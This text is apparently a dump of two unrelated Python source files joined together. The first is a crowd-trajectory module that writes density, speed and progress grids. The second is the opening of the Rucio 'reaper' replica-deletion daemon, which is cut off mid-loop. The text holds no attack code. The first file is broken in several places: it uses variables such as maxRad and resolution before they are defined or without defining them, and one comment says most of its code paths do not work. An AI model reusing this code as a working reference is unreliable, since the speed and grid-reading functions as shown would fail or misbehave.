NORM_CONTRIB_SPEED = 4 # distribute speed with normalized gaussian and then divide by contribution matrix
LAPLACE_SPEED = 5 # compute the magnitude of the laplacian of the velocity field
def __init__( self, outFileName, obstacles=None, arrayType=np.float32 ):
"""Constructs a GridFileSequence which caches to the indicated file name.
@param outFileName The name of the file to which the gridFileSequence writes.
@param obstacles An optional obstacleHandler object. Used for obstacle-dependent
computations.
@param arrayType A numpy datatype. Defaults to np.float32.
"""
self.outFileName = outFileName
# TODO: This currently doesn't have any effect. Eventually, it can be used for object-aware convolution
# or other operations.
self.obstacles = obstacles
self.arrayType = np.dtype( arrayType )
self.headerSize = 40 # this assumes that the arrayType is np.float32
def header( self, corner, size, resolution ):
'''Prepares a string for the header of the grid file sequence.
It is assumed that some of the information is unknown (min/max vals, grid count) and zero
place holders will be inserted for later replacement.
@param corner A Vector2 instance. The left-bottom corner of the grid's domain
(i.e. the minimum x- and y-values).
@param size A Vector2 instance. The width and height of the grid's domain.
@param resolution A 2-tuple of ints. Indicates the (width, height) of the grid.
@returns A binary string which represents the header information for this file sequence.
'''
s = struct.pack( 'ff', corner[0], corner[1] ) # minimum corner of grid
s += struct.pack( 'ff', size[0], size[1] ) # domain width and height
s += struct.pack( 'ii', resolution[0], resolution[1] ) # size of grid (cell counts)
s += struct.pack( 'i', TYPE_ID_MAP[ self.arrayType.type ] ) # the data type of the grids
s += struct.pack( 'i', 0 ) # grid count
s += struct.pack( 2 * self.arrayType.char, 0, 0 ) # range of grid values
self.headerSize = len( s )
return s
def fillInHeader( self, file, gridCount, minVal, maxVal ):
'''Writes the final grid count, minimum and maximum values to the file's header section.
This assumes that the original header had been already written and the sequence has been
fully created and written to the file. Now, the post hoc derived values must be set into
the header.
@param file An open file object.
@param gridCount An int. The number of grids in the file.
@param minVal A value of type self.arrayType. The minimum value across all grids.
@param maxVal A value of type self.arrayType. The maximum value across all grids.
'''
file.seek( 28 )
file.write( struct.pack( 'i', gridCount ) )
file.write( struct.pack( 2 * self.arrayType.char, minVal, maxVal ) )
def renderTraces( self, minCorner, size, resolution, frameSet, preWindow, postWindow, fileBase ):
"""Creates a sequence of images of the traces of the agents.
The trace extends temporally backwards preWindow frames.
The trace extends temporally forwards postWindow frames.
The dimensions of the rasterized grid are determined by: minCorner, size, resolution.
The rendered colors are then output via the colorMap and fileBase name.
"""
renderTraces( minCorner, size, resolution, frameSet, preWindow, postWindow, fileBase )
def computeDifference( self, reader1, reader2 ):
'''Computes the per-frame difference between two grid file sequences and saves it.
@param reader1 An instance of a GridFileSequenceReader.
@param reader2 An instance of a GridFileSequenceReader.
@returns A string. The name of the file created.
'''
assert( reader1.w == reader2.w )
assert( reader1.h == reader2.h )
assert( reader1.count == reader2.count )
assert( reader1.corner == reader2.corner )
assert( reader1.size == reader2.size )
fileName = self.outFileName + '.error'
outFile = open( fileName, 'wb' )
outFile.write( self.header( reader1.corner, reader1.size, ( reader1.w, reader1.h ) ) )
reader1.setNext( 0 )
reader2.setNext( 0 )
maxError = 0
while( True ):
try:
frame1, frameID1 = reader1.next()
frame2, frameID2 = reader2.next()
except StopIteration:
break
err = np.abs( frame1.cells - frame2.cells )
outFile.write( err.tostring() )
ERR = err.max()
if ( ERR > maxError ):
maxError = ERR
self.fillInHeader( outFile, reader1.count, 0.0, maxError )
outFile.close()
return fileName
def convolveSignal( self, gridDomain, kernel, signal, frameSet, overwrite=True ):
'''Creates a binary file representing the density scalar fields of each frame of the
pedestrian data.
@param gridDomain An instance of AbstractGrid, specifying the grid domain
and resolution over which the density field is calculated.
@param kernel The kernel to be used to create the scalar field. It is
convolved with the pedestrian data.
@param signal An instance of the signal type to be convolved. It includes the
signal domain. The data for the signal is set in each iteration
by the data in frameSet.
@param frameSet An instance of a pedestrian data sequence (could be simulated
or real data. It could be a sequence of voronoi diagrams.
@param overwrite A boolean. Indicates whether files should be created even if they
already exist or computed from scratch. If True, they are always created,
if False, pre-existing files are used.
@returns A string. The name of the output file.
'''
print "Convolve signal"
print "\t", gridDomain
print "\t", kernel
print "\t", signal
print "\t", frameSet
frameSet.setNext( 0 )
argsFunc = lambda: ( signal.copyEmpty(), frameSet, gridDomain, kernel )
return self._threadWork( 'density', threadConvolve, argsFunc, gridDomain, overwrite )
def computeVoronoiDensity( self, gridDomain, frameSet, obstacles=None, limit=-1 ):
'''Computes a density field for the frameset based on the voronoi diagram.
The density of each voronoi region is the inverse of the area of that region.
@param gridDomain An instance of AbstractGrid, specifying the grid domain
and resolution over which the density field is calculated.
@param frameSet An instance of a pedestrian data sequence (could be simulated
or real data. It could be a sequence of voronoi diagrams.
@param obstacles An instance of ?????. Used for performing the constrained voronoi
based on obstacles.
@param limit A float. The maximum distance a point can be and still lie
in a voronoi region.
@returns A string. The name of the output file.
'''
print "computeVoronoiDensity"
print "\t", gridDomain
print "\t", frameSet
frameSet.setNext( 0 )
argsFunc = lambda: ( frameSet, gridDomain, obstacles, limit )
return self._threadWork( 'voronoiDensity', threadVoronoiDensity, argsFunc, gridDomain )
def computeVoronoi( self, gridDomain, frameSet, obstacles=None, limit=-1 ):
'''Computes a density field for the frameset based on the voronoi diagram.
The density of each voronoi region is the inverse of the area of that region.
@param gridDomain An instance of AbstractGrid, specifying the grid domain
and resolution over which the density field is calculated.
@param frameSet An instance of a pedestrian data sequence (could be simulated
or real data. It could be a sequence of voronoi diagrams.
@param obstacles An instance of ?????. Used for performing the constrained voronoi
based on obstacles.
@param limit A float. The maximum distance a point can be and still lie
in a voronoi region.
@returns A string. The name of the output file.
'''
print "computeVoronoi"
print "\t", gridDomain
print "\t", frameSet
frameSet.setNext( 0 )
argsFunc = lambda: ( frameSet, gridDomain, obstacles, limit )
return self._threadWork( 'voronoi', threadVoronoi, argsFunc, gridDomain )
def _threadWork( self, fileExt, function, funcArgs, gridDomain, overwrite=True ):
'''Sets up threaded work.
@param fileExt A string. The extension applied to the GFS file.
@param function A function object. The function executed by each thread.
For the function to work its first four args must be:
1. a RasterReport instance
2. a threading lock for the buffer
3. A buffer instance ( simply a python list)
4. A threading lock for the data
@param funcArgs A callable object. Its return value is a tuple of values.
These values are the additional arguments for the work function.
They will be concatenated to the arguments liated above.
This is a function, because the arguments may need to change
with each thread. This interface allows that.
@param gridDomain An instance of AbstractGrid, specifying the grid domain
and resolution over which the density field is calculated.
@param overwrite A boolean. Indicates whether files should be created even if they
already exist or computed from scratch. If True, they are always created,
if False, pre-existing files are used.
@returns A string. The name of the output file.
'''
# file output
fileName = '%s.%s' % ( self.outFileName, fileExt )
if ( not overwrite ):
if ( os.path.exists( fileName ) ):
return fileName
outFile = open( fileName, 'wb' )
outFile.write( self.header( gridDomain.minCorner, gridDomain.size, gridDomain.resolution ) )
buffer = []
bufferLock = threading.Lock()
saveThread = threading.Thread( target=threadOutput, args=(outFile, buffer, bufferLock, time.clock(), self ) )
self.activeThreadCount = THREAD_COUNT
saveThread.start()
# prepare rasterization
frameLock = threading.Lock()
rasterThreads = []
rasterLogs = []
for i in range( THREAD_COUNT ):
rasterLogs.append( RasterReport() )
# This has self.obstacles
threadArgs = ( rasterLogs[-1], bufferLock, buffer, frameLock )
rasterThreads.append( threading.Thread( target=function, args=threadArgs + funcArgs() ) )
for i in range( THREAD_COUNT ):
rasterThreads[i].start()
for i in range( THREAD_COUNT ):
rasterThreads[i].join()
self.activeThreadCount -= 1
saveThread.join()
gridCount = 0
maxVal = 0.0
minVal = 1e8
for log in rasterLogs:
gridCount += log.count
if ( log.maxVal > maxVal ):
maxVal = log.maxVal
if ( log.minVal < minVal ):
minVal = log.minVal
# add the additional information about grid count and maximum values
self.fillInHeader( outFile, gridCount, minVal, maxVal )
outFile.close()
return fileName
def splatAgents( self, gridDomain, radius, pedData, overwrite=True ):
'''Splats the agents onto a grid based on position and the given radius
@param gridDomain An instance of AbstractGrid, specifying the grid domain
and resolution over which the density field is calculated.
@param radius The size (in world units) of the agent's visualization radius.
@param pedData The pedestrian data to splat (the product of a call to trajectory.loadTrajectory).
@param overwrite A boolean. Indicates whether files should be created even if they
already exist or computed from scratch. If True, they are always created,
if False, pre-existing files are used.
@returns A string. The name of the output file.
'''
kernel = Kernels.UniformCircleKernel( radius, gridDomain.cellSize[0], False ) # False on reflect
signal = Signals.PedestrianSignal( gridDomain.rectDomain )
pedData.setNext( 0 )
argsFunc = lambda: ( signal.copyEmpty(), pedData, gridDomain, kernel )
return self._threadWork( 'splat', threadConvolve, argsFunc, gridDomain, overwrite )
def computeSpeeds( self, gridDomain, pedData, timeStep, excludeStates=(), speedType=BLIT_SPEED, timeWindow=1, overwrite=True, maxSpeed=3.0 ):
'''Splats the agents onto a grid based on position and the given radius
@param gridDomain An instance of AbstractGrid, specifying the grid domain
and resolution over which the density field is calculated.
@param timeStep The duration of a single frame of data in the pedData.
@param pedData The pedestrian data to splat (the product of a call to trajectory.loadTrajectory).
@param excludeStates The state of agents to occlude. This only applies if the data has state information.
@param speedType The exact visualization type.
@param timeWindow The number of windows overwhich speed is computed - default is one frame, instantaneous speed.
@param overwrite A boolean. Indicates whether files should be created even if they
already exist or computed from scratch. If True, they are always created,
if False, pre-existing files are used.
@param maxSpeed Because the data may include 'teleporting', instantaneous velocity
can grow arbitrarily high. The computed speed is clamped to maxSpeed.
@returns A 2-tuple (StatRecord instance, string). The former is a record of the per-frame statistics
of the speed. The latter is the name of the output file.
'''
print "Computing speeds:"
print "\tminCorner: ", gridDomain.minCorner
print "\tsize: ", gridDomain.size
print "\tresolution: ", gridDomain.resolution
print "\ttime step: ", timeStep
print "\ttime window:", timeWindow
fileName = self.outFileName + '.speed'
outFile = open( fileName, 'wb' )
outFile.write( self.header( gridDomain.minCorner, gridDomain.size, gridDomain.resolution ) )
maxVal = -1e6
minVal = 1e6
gridCount = 0
gridSize = gridDomain.resolution[0] * gridDomain.resolution[1]
cellSize = gridDomain.cellSize
pedData.setNext( 0 )
data = []
try:
data = [ pedData.next()[0].copy() for i in range( timeWindow + 1 ) ]
except StopIteration:
print "Unable to compute speed! Insufficient frames of data for the given window!"
return
# continue while the index of the last frame on the queue is greater than the index of the first frame
# TODO: THIS IS INCREDIBLY BROKEN!!!! MOST OF THESE CODE PATHS DON'T WORK!
distFunc = lambda x, y: np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
print "Speedy type:", speedType
if ( speedType == GridFileSequence.BLIT_SPEED ):
speedFunc = RasterGrid.rasterizeSpeedBlit
kernel = None
gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution, -1.0 )
elif ( speedType == GridFileSequence.NORM_SPEED ):
speedFunc = RasterGrid.rasterizeSpeedGauss
kernel = Kernel( maxRad, distFunc, cellSize )
gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
elif ( speedType == GridFileSequence.UNNORM_SPEED ):
speedFunc = RasterGrid.rasterizeSpeedGauss
kernel = Kernel( maxRad, distFunc, cellSize )
gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
elif ( speedType == GridFileSequence.NORM_DENSE_SPEED ):
## try:
## denseFile = open( self.outFileName + ".density", "rb" )
## except:
## print "Can't open desnity file: %.density" % ( self.outFileName )
## raise
## else:
## w, h, count, minVal, maxVal = struct.unpack( 'iiiff', denseFile.read( self.headerSize ) )
## assert( w == resolution[0] and h == resolution[1] )
## speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeDenseSpeed( g, denseFile, k, f2, f1, dist, rad, step )
## kernel = Kernel( maxRad, distFunc, cellSize )
## gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
raise ValueError, "This currently unsupported."
elif ( speedType == GridFileSequence.NORM_CONTRIB_SPEED ):
speedFunc = RasterGrid.rasterizeContribSpeed
kernel = Kernel( maxRad, distFunc, cellSize )
gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
elif ( speedType == GridFileSequence.LAPLACE_SPEED ):
distFunc = lambda x, y: 1.0 / ( np.pi * maxRad * maxRad ) * ((x * x + y * y - maxRad * maxRad) / (0.25 * maxRad ** 4 ) ) * np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
X = np.zeros( resolution, dtype=np.float32 )
Y = np.zeros( resolution, dtype=np.float32 )
speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeVelocity( g, X, Y, k, f2, f1, dist, rad, step )
kernel = Kernel( maxRad, distFunc, cellSize )
maxRad = None
# TODO: This will probably break for some other speed vis method
stats = StatRecord( pedData.agentCount() )
while ( True ):
f1 = data.pop(0)
f2 = data[ -1 ]
g = gridFunc()
speedFunc( g, kernel, f2, f1, distFunc, maxRad, timeStep * timeWindow, excludeStates, stats, maxSpeed )
M = g.maxVal()
if ( M > maxVal ):
maxVal = M
m = g.minVal()
if ( m < minVal ):
minVal = m
outFile.write( g.binaryString() )
gridCount += 1
try:
data.append( pedData.next()[0].copy() )
except StopIteration:
break
stats.nextFrame()
if ( speedType != GridFileSequence.LAPLACE_SPEED ):
minVal = 0
# add the additional information about grid count and maximum values
self.fillInHeader( outFile, gridCount, minVal, maxVal )
outFile.close()
return stats, fileName
def initProgress( self, frame ):
'''A helper function for the progress compuation. Creates an N x 3 array.ArrayType
Columns 0 & 1 are normalized vectors pointing to the direction of the agents and
column2 is the best progress.'''
agtCount = len( frame.agents )
progress = np.zeros( ( agtCount, 3 ), dtype=np.float32 )
for i in range( agtCount ):
agt = frame.agents[ i ]
dir = agt.pos.normalize()
progress[ i, 0] = dir.x
progress[ i, 1] = dir.y
return progress
def computeProgress( self, minCorner, size, resolution, maxRad, frameSet, timeStep, excludeStates, timeWindow=1 ):
"""Computes the progress from one frame to the next - progress is measured in the fraction
of the circle traversed from the initial position"""
print "Computing progress:"
print "\tminCorner: ", minCorner
print "\tsize: ", size
print "\tresolution: ", resolution
print "\tmaxRad: ", maxRad
print "\ttime step: ", timeStep
print "\ttime window:", timeWindow
outFile = open( self.outFileName + '.progress', 'wb' )
outFile.write( self.header( minCorner, size, resolution ) )
maxVal = -1e6
minVal = 1e6
gridCount = 0
gridSize = resolution[0] * resolution[1]
cellSize = Vector2( size.x / float( resolution[0] ), size.y / float( resolution[1] ) )
frameSet.setNext( 0 )
data = [ frameSet.next() for i in range( timeWindow + 1 ) ]
stats = StatRecord( frameSet.agentCount() )
initFrame, initIndex = data[0]
progress = self.initProgress( initFrame )
while ( data[ -1 ][0] ):
print '.',
f1, i1 = data.pop(0)
f2, i2 = data[ -1 ]
g = RasterGrid( minCorner, size, resolution, 100.0 )
g.rasterizeProgress( f2, initFrame, progress, excludeStates, stats )
m = g.minVal()
if ( m < minVal ):
minVal = m
g.swapValues( 100.0, -100.0 )
M = g.maxVal()
if ( M > maxVal ):
maxVal = M
outFile.write( g.binaryString() )
gridCount += 1
data.append( frameSet.next() )
stats.nextFrame()
print
# add the additional information about grid count and maximum values
self.fillInHeader( outFile, gridCount, minVal, maxVal )
outFile.close()
return stats
def computeAngularSpeeds( self, minCorner, size, resolution, maxRad, frameSet, timeStep, excludeStates, speedType=BLIT_SPEED, timeWindow=1 ):
"""Computes the displacements from one cell to the next"""
print "Computing angular speed:"
print "\tminCorner: ", minCorner
print "\tsize: ", size
print "\tresolution: ", resolution
print "\tmaxRad: ", maxRad
print "\ttime step: ", timeStep
print "\ttime window:", timeWindow
outFile = open( self.outFileName + '.omega', 'wb' )
outFile.write( self.header( minCorner, size, resolution ) )
maxVal = -1e6
minVal = 1e6
gridCount = 0
gridSize = resolution[0] * resolution[1]
cellSize = Vector2( size.x / float( resolution[0] ), size.y / float( resolution[1] ) )
frameSet.setNext( 0 )
data = [ frameSet.next() for i in range( timeWindow + 1 ) ]
# continue while the index of the last frame on the queue is greater than the index of the first frame
distFunc = lambda x, y: np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
print "Speedy type:", speedType
if ( speedType == GridFileSequence.BLIT_SPEED ):
speedFunc = RasterGrid.rasterizeOmegaBlit
kernel = None
gridFunc = lambda: RasterGrid( minCorner, size, resolution, 720.0 )
elif ( speedType == GridFileSequence.NORM_SPEED ):
raise ValueError, "Compute Angular speed doesn't support normalized angular speed"
## speedFunc = RasterGrid.rasterizeSpeedGauss
## kernel = Kernel( maxRad, distFunc, cellSize )
## gridFunc = lambda: RasterGrid( minCorner, size, resolution )
elif ( speedType == GridFileSequence.UNNORM_SPEED ):
raise ValueError, "Compute Angular speed doesn't support unnormalized angular speed"
## speedFunc = RasterGrid.rasterizeSpeedGauss
## kernel = Kernel( maxRad, distFunc, cellSize )
## gridFunc = lambda: RasterGrid( minCorner, size, resolution )
elif ( speedType == GridFileSequence.NORM_DENSE_SPEED ):
raise ValueError, "Compute Angular speed doesn't support normalized density angular speed"
## try:
## denseFile = open( self.outFileName + ".density", "rb" )
## except:
## print "Can't open desnity file: %.density" % ( self.outFileName )
## raise
## else:
## w, h, count, minVal, maxVal = struct.unpack( 'iiiff', denseFile.read( self.headerSize ) )
## assert( w == resolution[0] and h == resolution[1] )
## speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeDenseSpeed( g, denseFile, k, f2, f1, dist, rad, step )
## kernel = Kernel( maxRad, distFunc, cellSize )
## gridFunc = lambda: RasterGrid( minCorner, size, resolution )
elif ( speedType == GridFileSequence.NORM_CONTRIB_SPEED ):
raise ValueError, "Compute Angular speed doesn't support normalized contribution angular speed"
## speedFunc = RasterGrid.rasterizeContribSpeed
## kernel = Kernel( maxRad, distFunc, cellSize )
## gridFunc = lambda: RasterGrid( minCorner, size, resolution )
elif ( speedType == GridFileSequence.LAPLACE_SPEED ):
raise ValueError, "Compute Angular speed doesn't support laplacian angular speed"
## distFunc = lambda x, y: 1.0 / ( np.pi * maxRad * maxRad ) * ((x * x + y * y - maxRad * maxRad) / (0.25 * maxRad ** 4 ) ) * np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
## gridFunc = lambda: RasterGrid( minCorner, size, resolution )
## X = np.zeros( resolution, dtype=np.float32 )
## Y = np.zeros( resolution, dtype=np.float32 )
## speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeVelocity( g, X, Y, k, f2, f1, dist, rad, step )
## kernel = Kernel( maxRad, distFunc, cellSize )
stats = StatRecord( frameSet.agentCount() )
while ( data[ -1 ][0] ):
f1, i1 = data.pop(0)
f2, i2 = data[ -1 ]
g = gridFunc()
speedFunc( g, kernel, f2, f1, distFunc, maxRad, timeStep * timeWindow, excludeStates, stats )
m = g.minVal()
if ( m < minVal ):
minVal = m
# swap out 720.0 value for -720
g.swapValues( 720.0, -720.0 )
M = g.maxVal()
if ( M > maxVal ):
maxVal = M
outFile.write( g.binaryString() )
gridCount += 1
data.append( frameSet.next() )
stats.nextFrame()
## if ( speedType != GridFileSequence.LAPLACE_SPEED ):
## minVal = 0
# add the additional information about grid count and maximum values
self.fillInHeader( outFile, gridCount, minVal, maxVal )
outFile.close()
return stats
def readGrid( self, g, file, gridSize, index ):
"""Returns the index grid from the given file"""
gridSize = resolution[0] * resolution[1]
file.seek( self.headerSize + index * gridSize )
data = file.read( gridSize )
g.setFromBinary( data )
def computeAdvecFlow( self, minCorner, size, resolution, distFunc, maxDist, kernelSize, frameSet, lines ):
"""Performs a visualization of marking agents according to their intial position w.r.t. a line"""
# initialization
# Iterate through the agents on the first frame
frameSet.setNext( 0 )
f, i = frameSet.next()
for agt in f.agents:
pos = agt.pos
minDist = 1e6
for line in lines:
dist = line.pointDistance( pos )
if ( dist < minDist ):
minDist = dist
agt.value = max( maxDist - minDist, 0 )
# now iterate through each frame and rasterize it
outFile = open( self.outFileName + '.advec', 'wb' )
outFile.write( struct.pack( 'ii', resolution[0], resolution[1] ) ) # size of grid
outFile.write( struct.pack( 'i', 0 ) ) # grid count
outFile.write( struct.pack( 'ff', 0.0, 0.0 ) ) # range of grid values
maxVal = 0
gridCount = 0
gridSize = resolution[0] * resolution[1]
while ( True ):
g = RasterGrid( minCorner, size, resolution )
g.rasterizeValue( f, distFunc, kernelSize )
M = g.maxVal()
if ( M > maxVal ):
maxVal = M
outFile.write( g.binaryString() )
gridCount += 1
try:
f, i = frameSet.next( True )
except StopIteration:
break
# add the additional information about grid count and maximum values
self.fillInHeader( outFile, gridCount, 0.0, maxVal )
outFile.close()
def computeRegionSpeed( self, frameSet, polygons, timeStep, excludeStates, timeWindow=1 ):
'''Given an ordered set of polygons, computes the average speed for all agents in each polygon
per time step.'''
# NOTE: This only really applies to the tawaf.
print "Computing regional speed:"
print "\ttime step: ", timeStep
print "Number of polygons:", len(polygons)
frameSet.setNext( 0 )
data = [ frameSet.next() for i in range( timeWindow + 1 ) ]
regions = None
speeds = []
while ( data[ -1 ][0] ):
f1, i1 = data.pop(0)
f2, i2 = data[ -1 ]
frameSpeeds, regions = findRegionSpeed( f1, f2, timeStep * timeWindow, polygons, excludeStates, regions )
speeds.append( frameSpeeds )
data.append( frameSet.next() )
data = np.array( speeds )
np.savetxt( self.outFileName + ".region", data, fmt='%.5f' )
if __name__ == '__main__':
def test():
from trajectory import loadTrajectory
import os
## obstPath = r'/projects/crowd/fund_diag/paper/pre_density/experiment/Inputs/Corridor_oneway/c240_obstacles.xml'
## path = r'/projects/crowd/fund_diag/paper/pre_density/experiment/results/density/gaussian_S1.5/uo-065-240-240_combined_MB.density'
## outPath = r'/projects/crowd/fund_diag/paper/pre_density/experiment/results/density/gaussian_S1.5/uo-065-240-240_combined_MB_density/'
pedFile = r'/projects/crowd/fund_diag/paper/pre_density/experiment/Inputs/Corridor_onewayDB/uo-065-240-240_combined_MB.txt'
try:
frameSet = loadTrajectory( pedFile )
except ValueError:
print "Unable to recognize the data in the file: %s" % ( pedFile )
domain = AbstractGrid( Vector2( 0.0, -6 ), Vector2( 2.4, 12 ), ( 10, 100 ) )
gfs = GridFileSequence( 'sequence', arrayType=np.float32 )
gfs.computeVoronoiDensity( domain, frameSet, None )
## gfs = GridFileSequence( 'sequence', arrayType=np.int32 )
## gfs.computeVoronoi( domain, frameSet, None )
test()
|
reaper.py | # Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016
# - Thomas Beermann <thomas.beermann@cern.ch>, 2016-2019
# - Wen Guan <wguan.icedew@gmail.com>, 2016
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Dimitrios Christidis <dimitrios.christidis@cern.ch>, 2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
#
# PY3K COMPATIBLE
'''
Reaper is a daemon to manage file deletion.
'''
from __future__ import print_function, division
import datetime
import hashlib
import logging
import math
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.db.sqla.constants import ReplicaState
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, ServiceUnavailable, RSEAccessDenied,
ReplicaUnAvailable, ResourceTemporaryUnavailable,
DatabaseException, UnsupportedOperation,
ReplicaNotFound, RSENotFound)
from rucio.common.utils import chunks
from rucio.core import monitor
from rucio.core import rse as rse_core
from rucio.core.credential import get_signed_url
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.replica import (list_unlocked_replicas, update_replicas_states,
delete_replicas)
from rucio.core.rse import get_rse_attribute, sort_rses, get_rse_name
from rucio.core.rse_expression_parser import parse_expression
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def __check_rse_usage(rse_id):
"""
Internal method to check RSE usage and limits.
:param rse_id: the rse id.
:returns : max_being_deleted_files, needed_free_space, used, free.
"""
max_being_deleted_files, needed_free_space, used, free = None, None, None, None
rse = get_rse_name(rse_id=rse_id)
# Get RSE limits
limits = rse_core.get_rse_limits(rse_id=rse_id)
if not limits and 'MinFreeSpace' not in limits and 'MaxBeingDeletedFiles' not in limits:
return max_being_deleted_files, needed_free_space, used, free
min_free_space = limits.get('MinFreeSpace')
max_being_deleted_files = limits.get('MaxBeingDeletedFiles')
# Check from which sources to get used and total spaces
# Default is storage
source_for_total_space, source_for_used_space = 'storage', 'storage'
values = get_rse_attribute(rse_id=rse_id, key='source_for_total_space')
if values:
source_for_total_space = values[0]
values = get_rse_attribute(rse_id=rse_id, key='source_for_used_space')
if values:
source_for_used_space = values[0]
logging.debug('RSE: %(rse)s, source_for_total_space: %(source_for_total_space)s, '
'source_for_used_space: %(source_for_used_space)s' % locals())
# Get total and used space
usage = rse_core.get_rse_usage(rse_id=rse_id, source=source_for_total_space)
if not usage:
return max_being_deleted_files, needed_free_space, used, free
for var in usage:
total, used = var['total'], var['used']
break
if source_for_total_space != source_for_used_space:
usage = rse_core.get_rse_usage(rse_id=rse_id, source=source_for_used_space)
if not usage:
return max_being_deleted_files, needed_free_space, None, free
for var in usage:
used = var['used']
break
free = total - used
if min_free_space:
needed_free_space = min_free_space - free
return max_being_deleted_files, needed_free_space, used, free
def reaper(rses, worker_number=1, child_number=1, total_children=1, chunk_size=100,
once=False, greedy=False, scheme=None, delay_seconds=0):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param child_number: The child number.
:param total_children: The total number of children created per worker.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
"""
logging.info('Starting Reaper: Worker %(worker_number)s, '
'child %(child_number)s will work on RSEs: ' % locals() + ', '.join([rse['rse'] for rse in rses]))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
# Generate a hash just for the subset of RSEs
rse_names = [rse['rse'] for rse in rses]
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rse_names)).hexdigest()
sanity_check(executable=None, hostname=hostname)
nothing_to_do = {}
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
checkpoint_time = datetime.datetime.now()
# logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))
max_deleting_rate = 0
for rse in sort_rses(rses):
try:
if checkpoint_time + datetime.timedelta(minutes=1) < datetime.datetime.now():
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
# logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))
checkpoint_time = datetime.datetime.now()
if rse['id'] in nothing_to_do and nothing_to_do[rse['id']] > datetime.datetime.now():
continue
logging.info('Reaper %s-%s: Running on RSE %s %s', worker_number, child_number,
rse['rse'], nothing_to_do.get(rse['id']))
rse_info = rsemgr.get_rse_info(rse['rse'])
rse_protocol = rse_core.get_rse_protocols(rse_id=rse['id'])
if not rse_protocol['availability_delete']:
logging.info('Reaper %s-%s: RSE %s is not available for deletion', worker_number, child_number, rse_info['rse'])
nothing_to_do[rse['id']] = datetime.datetime.now() + datetime.timedelta(minutes=30)
continue
# Temporary hack to force gfal for deletion
for protocol in rse_info['protocols']:
if protocol['impl'] == 'rucio.rse.protocols.srm.Default' or protocol['impl'] == 'rucio.rse.protocols.gsiftp.Default':
protocol['impl'] = 'rucio.rse.protocols.gfal.Default'
needed_free_space, max_being_deleted_files = None, 100
needed_free_space_per_child = None
if not greedy:
max_being_deleted_files, needed_free_space, used, free = __check_rse_usage(rse_id=rse['id'])
logging.info('Reaper %(worker_number)s-%(child_number)s: Space usage for RSE %(rse)s - max_being_deleted_files: %(max_being_deleted_files)s, needed_free_space: %(needed_free_space)s, used: %(used)s, free: %(free)s' % locals())
if needed_free_space <= 0:
needed_free_space, needed_free_space_per_child = 0, 0
logging.info('Reaper %s-%s: free space is above minimum limit for %s', worker_number, child_number, rse['rse'])
else:
if total_children and total_children > 0:
needed_free_space_per_child = needed_free_space / float(total_children)
start = time.time()
with monitor.record_timer_block('reaper.list_unlocked_replicas'):
replicas = list_unlocked_replicas(rse_id=rse['id'],
bytes=needed_free_space_per_child,
limit=max_being_deleted_files,
worker_number=child_number,
total_workers=total_children,
delay_seconds=delay_seconds)
logging.debug('Reaper %s-%s: list_unlocked_replicas on %s for %s bytes in %s seconds: %s replicas', worker_number, child_number, rse['rse'], needed_free_space_per_child, time.time() - start, len(replicas))
if not replicas:
nothing_to_do[rse['id']] = datetime.datetime.now() + datetime.timedelta(minutes=30)
logging.info('Reaper %s-%s: No replicas to delete %s. The next check will occur at %s',
worker_number, child_number, rse['rse'],
nothing_to_do[rse['id']])
continue
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
for files in chunks(replicas, chunk_size):
logging.debug('Reaper %s-%s: Running on : %s', worker_number, child_number, str(files))
try:
